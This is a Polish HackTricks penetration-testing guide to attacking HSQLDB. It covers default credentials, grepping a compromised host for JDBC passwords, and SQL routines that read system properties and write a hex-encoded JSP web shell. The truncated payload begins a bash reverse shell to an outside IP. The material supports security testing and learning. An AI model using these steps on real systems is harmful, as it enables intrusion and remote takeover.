HackTrickstip
Ucz się i ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Podstawowe informacje
HSQLDB (HyperSQL DataBase) jest wiodącym systemem relacyjnej bazy danych SQL napisanym w Javie. Oferuje mały, szybki, wielowątkowy i transakcyjny silnik bazy danych z tabelami w pamięci i na dysku oraz obsługuje tryby osadzone i serwerowe.
Domyślny port: 9001
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
Informacje
Ustawienia domyślne
Zauważ, że domyślnie ta usługa prawdopodobnie działa w pamięci lub jest przypisana do localhost. Jeśli ją znalazłeś, prawdopodobnie wykorzystałeś inną usługę i szukasz podniesienia uprawnień.
Domyślne dane logowania to zazwyczaj sa z pustym hasłem.
Jeśli wykorzystałeś inną usługę, poszukaj możliwych danych logowania używając
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
Zauważ nazwę bazy danych - będziesz jej potrzebować do połączenia.
Zbieranie informacji
Połącz się z instancją DB, pobierając HSQLDB i rozpakowując hsqldb/lib/hsqldb.jar. Uruchom aplikację GUI (eww) używając java -jar hsqldb.jar i połącz się z instancją używając odkrytych/słabych poświadczeń.
Zauważ, że adres URL połączenia będzie wyglądał mniej więcej tak dla zdalnego systemu: jdbc:hsqldb:hsql://ip/DBNAME.
Sztuczki
Routines języka Java
Możemy wywoływać statyczne metody klasy Java z HSQLDB używając Routines języka Java. Zauważ, że wywoływana klasa musi być w classpath aplikacji.
JRT mogą być funkcjami lub procedurami. Funkcje mogą być wywoływane za pomocą instrukcji SQL, jeśli metoda Java zwraca jedną lub więcej zmiennych prymitywnych zgodnych z SQL. Są wywoływane za pomocą instrukcji VALUES.
Jeśli metoda Java, którą chcemy wywołać, zwraca void, musimy użyć procedury wywoływanej za pomocą instrukcji CALL.
Odczytywanie właściwości systemu Java
Utwórz funkcję:
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
Wykonaj funkcję:
VALUES(getsystemproperty('user.name'))
Możesz znaleźć listę właściwości systemowych tutaj.
Zapisz zawartość do pliku
Możesz użyć gadżetu Java com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename znajdującego się w JDK (automatycznie załadowanym do ścieżki klas aplikacji), aby zapisać elementy zakodowane w formacie hex na dysku za pomocą niestandardowej procedury. Zauważ maksymalny rozmiar 1024 bajtów.
Utwórz procedurę:
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
Wykonaj procedurę:
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.